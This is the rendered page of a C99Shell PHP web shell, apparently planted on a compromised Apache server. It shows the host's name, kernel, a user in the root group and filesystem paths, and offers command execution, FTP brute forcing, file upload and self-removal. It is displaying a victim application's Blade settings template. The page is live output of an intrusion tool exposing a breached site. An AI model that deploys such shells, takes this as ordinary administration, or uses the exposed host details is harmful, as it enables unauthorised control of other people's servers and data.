!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sender.picotech.app/public_html/storage/framework/views/   drwxrwxr-x
Free 28.23 GB of 117.98 GB (23.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     fcc4518c63457fede34f5ae9af28e1f9.php (2.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<table class="w-100">
    <tr>
        <td><label><?php echo e(trans('customer.email_notification')); ?></label></td>
        <td>
            <div class="form-group mt-2">
                <div class="custom-control custom-switch">
                    <input <?php echo e(isset($customer_settings['email_notification']) && $customer_settings['email_notification']=='true'?'checked':''); ?> type="checkbox" class="custom-control-input" id="notification_switch">
                    <label class="custom-control-label" for="notification_switch"></label>
                </div>
            </div>
        </td>
        <td></td>
        <td></td>
    </tr>

    <tr>
        <td><label for="">Webhook</label></td>
        <td>
            <select name="" id="webhook_type" class="form-control">
                <option <?php echo e(isset($customer_settings['webhook']) && json_decode($customer_settings['webhook'])->type=='get'?'selected':''); ?> value="get">GET</option>
                <option <?php echo e(isset($customer_settings['webhook']) && json_decode($customer_settings['webhook'])->type=='post'?'selected':''); ?> value="post">POST</option>
            </select>
        </td>
        <td>
            <input value="<?php echo e(isset($customer_settings['webhook']) && json_decode($customer_settings['webhook'])->url?json_decode($customer_settings['webhook'])->url:''); ?>" type="text" id="webhook_url" required class="form-control" placeholder="Enter webhook url">
        </td>
        <td><button id="webhookSubmit" type="button" class="btn btn-primary text-front-normal ml-2">Save</button></td>
    </tr>

    <tr class="mt-3">
        <td><label for="">Data Posting</label></td>
        <td>
            <select name="" id="data_posting_type" class="form-control">
                <option <?php echo e(isset($customer_settings['data_posting']) && json_decode($customer_settings['data_posting'])->type=='get'?'selected':''); ?> value="get">GET</option>
                <option <?php echo e(isset($customer_settings['data_posting']) && json_decode($customer_settings['data_posting'])->type=='post'?'selected':''); ?> value="post">POST</option>
            </select>
        </td>
        <td>
            <input value="<?php echo e(isset($customer_settings['data_posting']) && json_decode($customer_settings['data_posting'])->url?json_decode($customer_settings['data_posting'])->url:''); ?>" type="text" id="data_posting_url" required class="form-control" placeholder="Data Posting URL">
        </td>
        <td><button id="dataPostIngSubmit" type="button" class="btn btn-primary text-front-normal ml-2">Save</button></td>
    </tr>
</table>
<?php /**PATH /home/picotech/domains/sender.picotech.app/public_html/resources/views/customer/settings/notification_form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--